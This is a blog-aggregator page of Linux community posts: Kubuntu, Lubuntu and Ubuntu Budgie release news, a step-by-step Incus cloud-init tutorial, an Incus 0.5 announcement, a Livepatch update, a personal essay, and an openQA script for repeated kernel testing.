It has been a very busy 3 weeks here in Kubuntu!

Kubuntu 22.04.4 LTS has been released and can be downloaded from here: https://kubuntu.org/getkubuntu/

Work done for the upcoming 24.04 LTS release:

  • Frameworks 5.115 is in proposed waiting for the Qt transition to complete.
  • Debian merges for Plasma 5.27.10 are done, and I have confirmed there will be another bugfix release on March 6th.
  • Applications 23.08.5 is being worked on right now.
  • Added support for riscv64 hardware.
  • Bug triaging and several fixes!
  • I am working on Kubuntu branded Plasma-Welcome, Orca support and much more!
  • Aaron and the Kfocus team has been doing some amazing work getting Calamares perfected for release! Thank you!
  • Rick has been working hard on revamping kubuntu.org, stay tuned! Thank you!
  • I have added several more apparmor profiles for packages affected by https://bugs.launchpad.net/ubuntu/+source/kgeotag/+bug/2046844
  • I have aligned our meta package to adhere to https://community.kde.org/Distributions/Packaging_Recommendations and will continue to apply the rest of the fixes suggested there. Thanks for the tip Nate!

We have a branding contest! Please do enter, there are some exciting prizes https://kubuntu.org/news/kubuntu-graphic-design-contest/

Debian:

I have uploaded to NEW the following packages:

  • kde-inotify-survey
  • plank-player
  • aura-browser

I am currently working on:

  • alligator
  • xwaylandvideobridge

KDE Snaps:

KDE applications 23.08.5 have been uploaded to Candidate channel, testing help welcome. https://snapcraft.io/search?q=KDE I have also working on bug fixes, time allowing.

My continued employment depends on you, please consider a donation! https://kubuntu.org/donate/

Thank you for stopping by!

~Scarlett

on February 23, 2024 11:42 AM

February 22, 2024

Thanks to all the hard work from our contributors, Lubuntu 22.04.4 LTS has been released. With the codename Jammy Jellyfish, Lubuntu 22.04 is the 22nd release of Lubuntu, the eighth release of Lubuntu with LXQt as the default desktop environment. Support lifespan Lubuntu 22.04 LTS will be supported for 3 years until April 2025. Our […]
on February 22, 2024 08:23 PM

We are pleased to announce the release of the next version of our distro, the fourth 22.04 LTS point release. The LTS version is supported for 3 years while the regular releases are supported for 9 months. The new release rolls-up various fixes and optimizations by Ubuntu Budgie team, that have been released since the 22.04.3 release in August: For the adventurous among our community we…

Source

on February 22, 2024 06:15 PM

February 21, 2024

Oxygen Icons 6 Released

Jonathan Riddell

Oxygen Icons is an icon theme for use with any XDG compliant app and desktop.

It is part of KDE Frameworks 6 but is now released independently to save on resources.

This 6.0.0 release requires to be built with extra-cmake-modules from KF 6 which is not yet released, distros may want to wait until next week before building it.

Distros which ship this version can drop the version released as part of KDE Frameworks 5.

sha256: 28ec182875dcc15d9278f45ced11026aa392476f1f454871b9e2c837008e5774

URL: https://download.kde.org/stable/oxygen-icons/

Signed by E0A3EB202F8E57528E13E72FD7574483BB57B18D Jonathan Esk-Riddell <jr@jriddell.org>
https://jriddell.org/esk-riddell.gpg

on February 21, 2024 10:20 AM

February 16, 2024

It’s Been Eighty Four Years…

For the first time in four years, Ubuntu Studio is opening up a wallpaper competition! While the default wallpaper will, once again, be designed by Ubuntu Studio art lead Eylul but we need your help to fill create a truly wonderful collection of unique wallpapers!

For more details, visit our post on the Ubuntu Discourse!

on February 16, 2024 07:16 PM

February 03, 2024

Incus is a manager for virtual machines and system containers. There is also an Incus support forum.

A virtual machine (VM) is an instance of an operating system that runs on a computer, along with the main operating system. A virtual machine uses hardware virtualization features for the separation from the main operating system. With virtual machines, the full operating system boots up in them. You can use cloud-init to customize virtual machines that are launched with Incus.

A system container is an instance of an operating system that also runs on a computer, along with the main operating system. A system container, instead, uses security primitives of the Linux kernel for the separation from the main operating system. You can think of system containers as software virtual machines. System containers reuse the running Linux kernel of the host, therefore you can only have Linux system containers, any Linux distribution. You can use cloud-init to customize system containers that are launched with Incus.

In this post we see how to use cloud-init to customize Incus virtual machines and system containers. When you launch such an instance, they will be immediately customized to your liking and ready to use.

Prerequisites

  1. You have installed Incus or you have migrated from LXD.
  2. The container images that have a cloud variant are the ones that have support for cloud-init. Have a look at https://images.linuxcontainers.org/ and check that your favorite container image has a cloud variant in the Variant column.

You can also view which images have cloud-init support by running the following command. The command performs an image list for images on the images: remote, by matching the string cloud anywhere in their name.

incus image list images:cloud

Managing profiles in Incus

Incus has profiles, and these are used to group together configuration options. See how to use profiles in Incus.

When you launch a system container or a virtual machine, Incus uses by default the default profile for the configuration.

Let’s show this profile. The config section is empty and in this section we will be doing later the cloud-init stuff. There are two devices, the eth0 network device (because it is of type nic) which is served by the incusbr0 network bridge. If you migrated from LXD, it might be called lxdbr0. Then, there is the root disk device (because it is of type disk) which is served by the default storage pool. You can dig for more with incus network list and incus storage list.

$ incus profile show default
config: {}
description: Default Incus profile
devices:
  eth0:
    name: eth0
    network: incusbr0
    type: nic
  root:
    path: /
    pool: default
    type: disk
name: default
used_by:
....
$ 

You can perform many actions on Incus profiles. Here is the list of commands.

$ incus profile 
Usage:
  incus profile [flags]
  incus profile [command]

Available Commands:
  add         Add profiles to instances
  assign      Assign sets of profiles to instances
  copy        Copy profiles
  create      Create profiles
  delete      Delete profiles
  device      Manage devices
  edit        Edit profile configurations as YAML
  get         Get values for profile configuration keys
  list        List profiles
  remove      Remove profiles from instances
  rename      Rename profiles
  set         Set profile configuration keys
  show        Show profile configurations
  unset       Unset profile configuration keys

Global Flags:
      --debug          Show all debug messages
      --force-local    Force using the local unix socket
  -h, --help           Print help
      --project        Override the source project
  -q, --quiet          Don't show progress information
      --sub-commands   Use with help or --help to view sub-commands
  -v, --verbose        Show all information messages
      --version        Print version number

Use "incus profile [command] --help" for more information about a command.
$ 

Creating a profile for cloud-init

We are going to create a new profile, not a fully-fledged profile, that has just the cloud-init configuration. Then, when we are about to use the profile, we will specify that new profile along with the default profile. By doing so, we are not messing with the default profile; we keep them separate and tidy.

$ incus profile create cloud-dev
Profile cloud-dev created
$ incus profile show cloud-dev
config: {}
description: ""
devices: {}
name: cloud-dev
used_by: []
$ 

We want to insert the following cloud-init configuration. If you are viewing the following from my blog, you will notice that there is a gray background color for the text. That is important so that there are no extra spaces at the end of the lines. That would cause formatting issues later on. The cloud-init.user-data part says that the next will be about cloud-init. The | character at the end of the line is very significant. It means that until the end of this field, all commands should be kept verbatim. Whatever appears there, will be injected into the instance as soon as it starts, at the proper location for cloud-init. When the instance is starting for the first time, it will start the cloud-init service which will look for the injected commands and process them accordingly. In this example, we use runcmd to run the touch command and create the file /tmp/simos_was_here. We just want some evidence that cloud-init actually worked.

  cloud-init.user-data: |
    #cloud-config
    runcmd:
      - [touch, /tmp/simos_was_here]

We need to open the profile for editing, then paste the configuration. When you run the following line, a text editor will open (likely pico) and you can paste the above text in the config section. Remove the {} from the config: {} line.

$ incus profile edit cloud-dev

Here is how the cloud-dev profile should look like in the end. The command has a certain format. It’s a list of items, the first being the actual command to run (touch), and the second the argument to the command. It’s going to run touch /tmp/simos_was_here and should work with all distributions.

$ incus profile show cloud-dev
config:
  cloud-init.user-data: |
    #cloud-config
    runcmd:
      - [touch, /tmp/simos_was_here]
description: ""
devices: {}
name: cloud-dev
used_by: []
$ 

Now we are ready to launch a container.

Launching an Incus container with cloud-init

Alpine is a lightweight Linux distribution. Let’s see what’s in store for Alpine images that have cloud support. Using incus image (for Incus image-related commands) we want to list the available ones from the images: remote, and filter for alpine and cloud. Whatever comes after the remote (i.e. images:), is a filter word.

incus image list images: alpine cloud

Here is the full output. I appended --columns ldt to the command, which shows only three columns, l for shortest alias, d for description, and t for image type (either container or virtual machine). Without the columns, the output would be too wide and would not fit in my blog’s narrow width.

$ incus image list images: alpine cloud --columns ldt
+----------------------------+------------------------------------+-----------------+
|           ALIAS            |            DESCRIPTION             |      TYPE       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.16/cloud (1 more) | Alpine 3.16 amd64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.16/cloud (1 more) | Alpine 3.16 amd64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/3.16/cloud/arm64    | Alpine 3.16 arm64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.16/cloud/arm64    | Alpine 3.16 arm64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/3.17/cloud (1 more) | Alpine 3.17 amd64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.17/cloud (1 more) | Alpine 3.17 amd64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/3.17/cloud/arm64    | Alpine 3.17 arm64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.17/cloud/arm64    | Alpine 3.17 arm64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/3.18/cloud (1 more) | Alpine 3.18 amd64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.18/cloud (1 more) | Alpine 3.18 amd64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/3.18/cloud/arm64    | Alpine 3.18 arm64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.18/cloud/arm64    | Alpine 3.18 arm64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/3.19/cloud (1 more) | Alpine 3.19 amd64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.19/cloud (1 more) | Alpine 3.19 amd64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/3.19/cloud/arm64    | Alpine 3.19 arm64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.19/cloud/arm64    | Alpine 3.19 arm64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/edge/cloud (1 more) | Alpine edge amd64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/edge/cloud (1 more) | Alpine edge amd64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/edge/cloud/arm64    | Alpine edge arm64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/edge/cloud/arm64    | Alpine edge arm64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
$ 

I am going to use alpine/3.19/cloud. Alpine 3.19 was released in December 2023, so it’s a fairly recent version. The same version is also available as a virtual machine image which is handy. We could easily use the virtual machine version simply by adding --vm when we launch the image through incus launch. The rest would be the same. In the following we will be creating a container image.

In the following, I launch the cloud variety of the Alpine 3.19 image (images:alpine/3.19/cloud), I give it the name myalpine, and I apply both the default and cloud-dev Incus profiles. Why apply the default Incus profile as well? Because when we specify a profile, Incus does not add the default profile by default (see what I did here?). Therefore, we specify first the default profile, then the new cloud-dev profile. If the default profile had some configuration in the config: section, then the new cloud-dev profile would mask (hide) it. The cloud-init configuration is not merged among profiles; the last profile in the list overwrites any previous cloud-init configuration. Then, we get a shell into the container, and check that the file has been created in /tmp. Finally, we exit, stop the container and delete it. Nice and clean.

$ incus launch images:alpine/3.19/cloud myalpine --profile default --profile cloud-dev
Launching myalpine
$ incus shell myalpine
myalpine:~# ls -l /tmp/
total 1
-rw-r--r--    1 root     root             0 Feb  3 12:02 simos_was_here
myalpine:~# exit
$ incus stop myalpine
$ incus delete myalpine
$ 

Case study: Disable IPv6 addresses in container

The ultimate purpose of cloud-init is to provide customization while at the same time stick with standard container images as they are provided by the images: remote. The alternative to cloud-init would be to create a whole custom range images with our desired changes. In this case study, we are going to create a cloud-init configuration that disables IPv6 in Alpine containers (and virtual machines). The motivation of this, was a request by a user from the Incus discussion and support forum. Read over there how you would manually disable IPv6 in an Alpine container.

Here are the cloud-init instructions that disable IPv6 in a Alpine container or virtual machine. Alpine gets an IP address from DHCP which includes IPv4 and IPv6 addresses. At some point early in the boot process, we use the bootcmd module to run commands. We add a configuration to the sysctl service to disable IPv6. Then, we enable the sysctl service because it is disabled by default in AlpineLinux. Finally, we restart the service in order to apply the configuration we just added.

  cloud-init.user-data: |
    #cloud-config
    bootcmd:
      - echo "net.ipv6.conf.all.disable_ipv6 = 1" > /etc/sysctl.d/10-disable-ipv6.conf
      - rc-update add sysctl default
      - rc-service sysctl restart

Here we test out the new Incus profile with cloud-init to disable IPv6 in a container. There is no IPv6 address in the container.

$ incus launch images:alpine/3.19/cloud myalpine --profile default --profile cloud-alpine-noipv6
Launching myalpine
$ incus list myalpine
+----------+---------+--------------------+------+-----------+-----------+
|   NAME   |  STATE  |         IPV4       | IPV6 |   TYPE    | SNAPSHOTS |
+----------+---------+--------------------+------+-----------+-----------+
| myalpine | RUNNING | 10.10.10.44 (eth0) |      | CONTAINER | 0         |
+----------+---------+--------------------+------+-----------+-----------+
$ incus stop myalpine
$ incus delete myalpine
$ 

We tried with a system container. How about a virtual machine? Let’s try the same with a virtual machine. The same command but with --vm added to it. We get an issue that the AlpineLinux image cannot work with Secure Boot. Incus provides an environment that offers Secure Boot but AlpineLinux cannot work with it. Therefore, we instruct Incus not to offer Secure Boot.

$ incus launch images:alpine/3.19/cloud myalpine --vm --profile default --profile cloud-alpine-noipv6
Launching myalpine
Error: Failed instance creation: The image used by this instance is incompatible with secureboot. Please set security.secureboot=false on the instance
$ incus delete --force myalpine
$ incus launch images:alpine/3.19/cloud myalpine --vm --profile default --profile cloud-alpine-noipv6 --config security.secureboot=false
Launching myalpine
$ incus list myalpine
+----------+---------+--------------------+------+-----------------+-----------+
|   NAME   |  STATE  |        IPV4        | IPV6 |      TYPE       | SNAPSHOTS |
+----------+---------+--------------------+------+-----------------+-----------+
| myalpine | RUNNING | 10.10.10.88 (eth0) |      | VIRTUAL-MACHINE | 0         |
+----------+---------+--------------------+------+-----------------+-----------+
$ incus stop myalpine
$ incus delete myalpine
$ 

Case study: Launching a Debian instance with a Web server

A common task when using Incus, is to launch an instance, install a Web server, modify the default HTML file to say Hello, world!, and finally view the file using the host’s Web browser. Instead of doing all these steps manually, we automate them.

In this example, when the instance is launched, Incus places the cloud-init instructions in the file /var/lib/cloud/seed/nocloud-net/user-data. The cloud-init service in the instance is started. The following Incus profile uses more advanced cloud-init commands. It performs a package update, then a package upgrade, and finally it would reboot if the package upgrade requires it. We do not need to specify which command would perform the package update or upgrade because cloud-init can deduce them from the running system. Next, it installs the nginx package. Finally, our custom script is created in /var/lib/cloud/scripts/per-boot/edit-nginx-index.sh. The cloud-init service run the edit-nginx-index.sh script, which modifies the /var/www/html/index.nginx-debian.html file, which is the default HTML file for nginx in Debian.

$ incus profile create cloud-debian-helloweb
Profile cloud-debian-helloweb created
$ incus profile edit cloud-debian-helloweb
<furiously editing the cloud-init section>
$ incus profile show cloud-debian-helloweb 
config:
  cloud-init.user-data: |
    #cloud-config
    package_update: true
    package_upgrade: true
    package_reboot_if_required: true
    packages:
      - nginx
    write_files:
    - path: /var/lib/cloud/scripts/per-boot/edit-nginx-index.sh
      permissions: 0755
      content: |
        #!/bin/bash
        sed -i 's/Welcome to nginx/Welcome to Incus/g' /var/www/html/index.nginx-debian.html
        sed -i 's/Thank you for using nginx/Thank you for using Incus/g' /var/www/html/index.nginx-debian.html
description: ""
devices: {}
name: cloud-debian-helloweb
used_by: []
$ 

Let’s test these in a Debian system container.

$ incus launch images:debian/12/cloud mydebian --profile default --profile cloud-debian-helloweb
Launching mydebian
$ incus list mydebian --columns ns4t
+----------+---------+---------------------+-----------+
|   NAME   |  STATE  |         IPV4        |   TYPE    |
+----------+---------+---------------------+-----------+
| mydebian | RUNNING | 10.10.10.120 (eth0) | CONTAINER |
+----------+---------+---------------------+-----------+
$ 

Open up the above IP address in your favorite Web browser. Note that the home page now has two references to Incus, thanks to the changes that we did through cloud-init.

For completeness, the same with a Debian virtual machine. In this case, we just add --vm in the incus launch command line and all the rest are the same. The Debian VM image works with Secure Boot. When you get the IP address, open up the page in your favorite Web browser. Note that since this is a virtual machine, the network device is not eth0 but a normal-looking network device.

$ incus stop mydebian
$ incus delete mydebian
$ incus launch images:debian/12/cloud mydebian --vm --profile default --profile cloud-debian-helloweb
Launching mydebian

<wait for 10-20 seconds because virtual machines take more time to setup>

$ incus list mydebian --columns ns4t
+----------+---------+------------------------+-----------------+
|   NAME   |  STATE  |          IPV4          |      TYPE       |
+----------+---------+------------------------+-----------------+
| mydebian | RUNNING | 10.10.10.110 (enp5s0) | VIRTUAL-MACHINE |
+----------+---------+------------------------+-----------------+
$ 

Summary

We have seen how to use the cloud Incus images, both for containers and virtual machines. They provide customization to the Incus instances and it helps you to get them configured to your liking from the start.

cloud-init offers a lot of opportunity for customization. Normally you would setup the Incus instance manually to your liking, and then interpret your changes into cloud-init commands.

Bonus content #1: Cloud-init from command-line

You can also pass the cloud-init configuration through the command-line at the moment of the creation of the instance. That is, you can even use cloud-init in Incus without a profile!

Here is the very first example of this tutorial.

  cloud-init.user-data: |
    #cloud-config
    runcmd:
      - [touch, /tmp/simos_was_here

We remove the first line and keep the rest. We save as a file with filename, for example, cloud-simos.yml.

    #cloud-config
    runcmd:
      - [touch, /tmp/simos_was_here

Next, we can launch an instance with the following syntax. We use the --config parameter to set the key cloud-init.user-data to the content of the, in this example, cloud-simos.yml file. The syntax $(command) is a syntax of the Bash shell. Most likely it is supported in other shells. If you use automation, verify that the shell supports this syntax.

incus launch images:alpine/3.19/cloud alpine  --config=cloud-init.user-data="$(cat cloud-simos.yml)"

Bonus content #2

There are two configurable keys in cloud-init.

  1. The cloud-init.user-data, meant for user configuration.
  2. The cloud-init.vendor-data, meant for vendor configuration.

In our case, if we plan to use several Incus profiles with cloud-init configuration, it is possible to split the configuration between two profiles. The two set of configuration run separate from each other. The user-data are applied last.

Troubleshooting

Error: My cloud-init instructions are all messed up!

Here is what I got!

$ incus profile show cloud-dev
config:
  cloud-init.user-data: "#cloud-config\nruncmd: \n  - [touch, /tmp/simos_was_here]\n"
description: ""
devices: {}
name: cloud-dev
used_by: []
$ 

This happens if there are any extra spaces at the end of the cloud-init lines. pico, the default editor tries to help you on this. The above problem happened because there was some extra space somewhere in the cloud-init configuration.

There is an extra space at the end of runcmd:, shown in red. Not good.

You would need to remove the configuration and paste it again, taking care of the formatting. While editing with the pico text editor, there should be no red blocks at the end of the lines.

How can I debug cloud-init?

When an Incus instance with cloud-init is launched, the cloud-init service is running, and it creates two log files, /var/log/cloud-init.log and /var/log/cloud-init-output.log.

Here are some relevant lines from cloud-init.log relating to the nginx example.

2024-02-03 19:07:09,237 - util.py[DEBUG]: Writing to /var/lib/cloud/scripts/per-boot/edit-nginx-index.sh - wb: [755] 200 bytes
...
2024-02-03 19:07:14,814 - subp.py[DEBUG]: Running command ['/var/lib/cloud/scripts/per-boot/edit-nginx-index.sh'] with allowed return codes [0] (shell=False, capture=False)
...

Error: Unable to connect

If you try to open the Web server in the Incus instance and you get a browser error Unable to connect, then

  1. Verify that you got the correct IP address of the Incus instance.
  2. Verify that the URL is http:// and not https://. Some browsers switch automatically to https while in these examples we have only launched plain http Web servers.
on February 03, 2024 07:39 PM

January 30, 2024

There’s a YouTube channel called Clickspring, run by an Australian bloke called Chris who is a machinist: a mechanical engineer with a lathe and a mill and all manner of little tools. I am not a machinist — at school I was fairly inept at what we called CDT, for Craft Design and Technology, and what Americans much more prosaically call “shop class”. My dad was, though, or an engineer at least. Although Chris builds clocks and beautiful brass mechanisms, and my dad built aeroplanes. Heavy engineering. All my engineering is software, which actual engineers don’t think is engineering at all, and most of the time I don’t either.

You can romanticise it: claim that software development isn’t craft, it’s art. And there is a measure of truth in this. It’s like writing, which is the other thing I spend a lot of time doing for money; that’s an art, too.

If you’re doing it right, at least.

Most of the writing that’s done, though, isn’t art. And most of the software development isn’t, either. Or most of the engineering. For every one person creating beauty in prose or code or steel, there are fifty just there doing the job with no emotional investment in what they’re doing at all. Honestly, that’s probably a good thing, and not a complaint. While I might like the theoretical idea of a world where everything is hand made by someone who cares, I don’t think that you should have to care in order to get paid. The people who are paying you don’t care, so you shouldn’t have to either.

It’s nice if you can swing it so you get both, though.

The problem is that it’s not possible to instruct someone to give a damn. You can’t regulate the UK government into giving a damn about people who fled a war to come here to find their dream of being a nurse, you can’t regulate Apple bosses into giving a damn about the open web, you can’t regulate CEOs into giving a damn about their employees or governments about their citizens or landlords about their tenants. That’s not what regulation is for; people who give a damn largely don’t need regulation because they want to do the right thing. They might need a little steering into knowing what the right thing is, but that’s not the same.

No, regulation is there as a reluctant compromise: since you can’t make people care, the best you can do is in some rough and ready fashion make them behave in a similar way to the way they would if they did. Of course, this is why the most insidious kind of response is not an attempt to evade responsibility but an attack on the system of regulation itself. Call judges saboteurs or protesters criminals or insurgents patriots. And why the most heinous betrayal is one done in the name of the very thing you’re destroying. Claim to represent the will of the people while hurting those people. Claim to be defending the law while hiding violence and murder behind a badge. Claim privacy as a shield for surveillance or for exclusion. We all sorta thought that the system could protect us, that those with the power could be trusted to use it at least a little responsibly. And the last year has been one more in a succession of years demonstrating just how wrong that is. This and no other is the root from which a tyrant springs; when he first appears he is a protector.

The worst thing about it is that the urge to protect other people is not only real but the best thing about ourselves. When it’s actually real. Look after others, especially those who need it, and look after yourself, because you’re one of the people who needs it.

Chris from Clickspring polishes things to a high shine using tin, which surprised me. I thought bringing out the beauty in something needed a soft cloth but no, it’s done with metal. Some things, like silver, are basically shiny with almost no effort; there’s a reason people have prized silver things since before we could even write down why, and it’s not just because you could find lumps of it lying around the place with no need to build a smelting furnace. Silver looks good, and makes you look good in turn. Tin is useful, and it helps polish other things to a high shine.

Today’s my 48th birthday. A highly composite number. The ways Torah wisdom is acquired. And somewhere between silver and tin. That sounds OK to me.

on January 30, 2024 09:50 PM

January 26, 2024

Announcing Incus 0.5

Stéphane Graber

Incus 0.5 is now out as the first release of 2024!

This is the first release featuring no imported changes from the LXD project, following Canonical’s decision to re-license LXD and add in a CLA. You’ll find details about that in one of my previous posts.

Overall, it’s a pretty busy release with a good mix of CLI improvements, new features for VM users, more flexibility around cluster evacuations and host shutdowns and a few more API improvements.

A variety of 3rd party tools have also been getting Incus support since the previous release, including, Ansible, Terraform/OpenTofu and Packer.

Also of note, we now have native distribution packages for Arch Linux, Debian, Gentoo, NixOS, Ubuntu and Void Linux. With ongoing work on a native Fedora package (COPR repo available until then).
We’ve updated our installation instructions to cover all of those!

The full announcement and changelog can be found here.
And for those who prefer videos, here’s the release overview video:

As always, you can take Incus up for a spin through our online demo service at: https://linuxcontainers.org/incus/try-it/

Just a quick reminder that my company is offering commercial support on Incus, ranging from by-the-hour support contracts to one-off services on things like initial migration from LXD, review of your deployment to squeeze the most out of Incus or even feature sponsorship.
You’ll find all details of that here: https://zabbly.com/incus

Donations towards my work on this and other open source projects is also always appreciated, you can find me on Github Sponsors, Patreon and Ko-fi.

And lastly, a quick note that I’ll be at FOSDEM next week, so if you’re attending and want to come say hi, you’ll find me in the containers devroom on Saturday and the kernel devroom on Sunday!

on January 26, 2024 09:45 PM

January 25, 2024

Linux kernel getting a livepatch whilst running a marathon. Generated with AI.

Livepatch service eliminates the need for unplanned maintenance windows for high and critical severity kernel vulnerabilities by patching the Linux kernel while the system runs. Originally the service launched in 2016 with just a single kernel flavour supported.

Over the years, additional kernels were added: new LTS releases, ESM kernels, Public Cloud kernels, and most recently HWE kernels too.

Recently livepatch support was expanded for FIPS compliant kernels, Public cloud FIPS compliant kernels, and as well IBM Z (mainframe) kernels. Bringing the total of kernel flavours support to over 60 distinct kernel flavours supported in parallel. The table of supported kernels in the documentation lists the supported kernel flavours ABIs, the duration of individual build's support window, supported architectures, and the Ubuntu release. This work was only possible thanks to the collaboration with the Ubuntu Certified Public Cloud team, engineers at IBM for IBM Z (s390x) support, Ubuntu Pro team, Livepatch server & client teams.

It is a great milestone, and I personally enjoy seeing the non-intrusive popup on my Ubuntu Desktop that a kernel livepatch was applied to my running system. I do enable Ubuntu Pro on my personal laptop thanks to the free Ubuntu Pro subscription for individuals.

What's next? The next frontier is supporting ARM64 kernels. The Canonical kernel team has completed the gap analysis to start supporting Livepatch Service for ARM64. Upstream Linux requires development work on the consistency model to fully support livepatch on ARM64 processors. Livepatch code changes are applied on a per-task basis, when the task is deemed safe to switch over. This safety check depends mostly on kernel stacktraces. For these checks, CONFIG_HAVE_RELIABLE_STACKTRACE needs to be available in the upstream ARM64 kernel. (see The Linux Kernel Documentation). There are preliminary patches that enable reliable stacktraces on ARM64, however these turned out to be problematic as there are lots of fix revisions that came after the initial patchset that AWS ships with 5.10. This is a call for help from any interested parties. If you have engineering resources and are interested in bringing Livepatch Service to your ARM64 platforms, please reach out to the Canonical Kernel team on the public Ubuntu Matrix, Discourse, and mailing list. If you want to chat in person, see you at FOSDEM next weekend.

on January 25, 2024 06:01 PM
Lubuntu 23.04 has reached end-of-life as of today, January 25, 2024. It will no longer receive software updates (including security fixes) or technical support. All users are urged to upgrade to Lubuntu 23.10 as soon as possible to stay secure. You can upgrade to Lubuntu 23.10 without reinstalling Lubuntu from scratch by following the official […]
on January 25, 2024 04:18 PM

This is a follow up to my previous post about How to test things with openQA without running your own instance, so you might want to read that first.

Now, while hunting for bsc#1219073 which is quite sporadic, and took quite some time to show up often enough so that became noticeable and traceable, once stars aligned and managed to find a way to get a higher failure rate, I wanted to have a way for me and for the developer to test the kernel with the different patches to help with the bisecting and ease the process of finding the culprit and finding a solution for it.

I came with a fairly simple solution, using the --repeat parameter of the openqa-cli tool, and a simple shell script to run it:

```bash
$ cat ~/Downloads/trigger-kernel-openqa-mdadm.sh
# the kernel repo must be the one without https; tests don't have the kernel CA installed
KERNEL="KOTD_REPO=http://download.opensuse.org/repositories/Kernel:/linux-next/standard/"

REPEAT="--repeat 100" # using 100 by default
JOBS="https://openqa.your.instan.ce/tests/13311283 https://openqa.your.instan.ce/tests/13311263 https://openqa.your.instan.ce/tests/13311276 https://openqa.your.instan.ce/tests/13311278"
BUILD="bsc1219073"
for JOB in $JOBS; do 
	openqa-clone-job --within-instance $JOB CASEDIR=https://github.com/foursixnine/os-autoinst-distri-opensuse.git#tellmewhy ${REPEAT} \
		_GROUP=DEVELOPERS ${KERNEL} BUILD=${BUILD} FORCE_SERIAL_TERMINAL=1\
		TEST="${BUILD}_checkmdadm" YAML_SCHEDULE=schedule/qam/QR/15-SP5/textmode/textmode-skip-registration-extra.yaml INSTALLONLY=0 DESKTOP=textmode\
		|& tee jobs-launched.list;
done;

There are few things to note here:

  • the kernel repo must be the one without https; tests don’t have the CA installed by default.
  • the --repeat parameter is set to 100 by default, but can be changed to whatever number is desired.
  • the JOBS variable contains the list of jobs to clone and run, having all supported architecures is recommended (at least for this case)
  • the BUILD variable can be anything, but it’s recommended to use the bug number or something that makes sense.
  • the TEST variable is used to set the name of the test as it will show in the test overview page, you can use TEST+=foo if you want to append text instead of overriding it, the --repeat parameter, will append a number incrementally to your test, see os-autoinst/openQA#5331 for more details.
  • the YAML_SCHEDULE variable is used to set the yaml schedule to use, there are other ways to modify the schedule, but in this case I want to perform a full installation

Running the script

  • Ensure you can run at least the openQA client; if you need API keys, see post linked at the beginning of this post
  • replace the kernel repo with your branch in line 5
  • run the script $ bash trigger-kernel-openqa-mdadm.sh and you should get the following, times the --repeat if you modified it
1 job has been created:
 - sle-15-SP5-Full-QR-x86_64-Build134.5-skip_registration+workaround_modules@64bit -> https://openqa.your.instan.ce/tests/13345270

Each URL, will be a job triggered in openQA, depending on the load and amount of jobs, you might need to wait quite a bit (some users can help moving the priority of these jobs so it executes faster)

The review stuff:

Looking at the results

  • Go to https://openqa.your.instan.ce/tests/overview?distri=sle&build=bsc1219073&version=15-SP5 or from any job from the list above click on Job groups menu at the top, and select Build bsc1219073
  • Click on “Filter”
  • type the name of the test module to filter in the field Module name, e.g mdadm, and select the desired result of such test module e.g failed (you can also type, and select multiple result types)
  • Click Apply
  • The overall summary of the build overview page, will provide you with enough information to calculate the pass/fail rate.

A rule of thumb: anything above 5% is bad, but you need to also understand your sample size + the setup you’re using; YMMV.

Ain’t nobody got time to wait

The script will generate a file called: jobs-launched.list, in case you absolutely need to change the priority of the jobs, set it to 45, so it runs higher than default priority, which is 50 cat jobs-launched.list | grep https | sed -E 's/^.*->\s.*tests\///' | xargs -r -I {} bash -c "openqa-cli api --osd -X POST jobs/{}/prio prio=45; sleep 1"

The magic

The actual magic is in the schedule, so right after booting the system and setting it up, before running the mdadm test, I inserted the update_kernel module, which will add the kernel repo specified by KOTD_REPO, and install the kernel from there, reboot the system, and leave the system ready for the actual test, however I had to add very small changes:

---
 tests/kernel/update_kernel.pm | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/tests/kernel/update_kernel.pm b/tests/kernel/update_kernel.pm
index 1d6312bee0dc..048da593f68f 100644
--- a/tests/kernel/update_kernel.pm
+++ b/tests/kernel/update_kernel.pm
@@ -398,7 +398,7 @@ sub boot_to_console {
 sub run {
     my $self = shift;
 
-    if ((is_ipmi && get_var('LTP_BAREMETAL')) || is_transactional) {
+    if ((is_ipmi && get_var('LTP_BAREMETAL')) || is_transactional || get_var('FORCE_SERIAL_TERMINAL')) {
         # System is already booted after installation, just switch terminal
         select_serial_terminal;
     } else {
@@ -476,7 +476,7 @@ sub run {
         reboot_on_changes;
     } elsif (!get_var('KGRAFT')) {
         power_action('reboot', textmode => 1);
-        $self->wait_boot if get_var('LTP_BAREMETAL');
+        $self->wait_boot if (get_var('FORCE_SERIAL_TERMINAL') || get_var('LTP_BAREMETAL'));
     }
 }
 

Likely I’ll make a new pull request to have this in the test distribution, but for now this is good enough to help kernel developers to do some self-service and trigger their own openQA tests, that have many more tests (hopefully in parallel) and faster than if there was a person doing all of this manually.

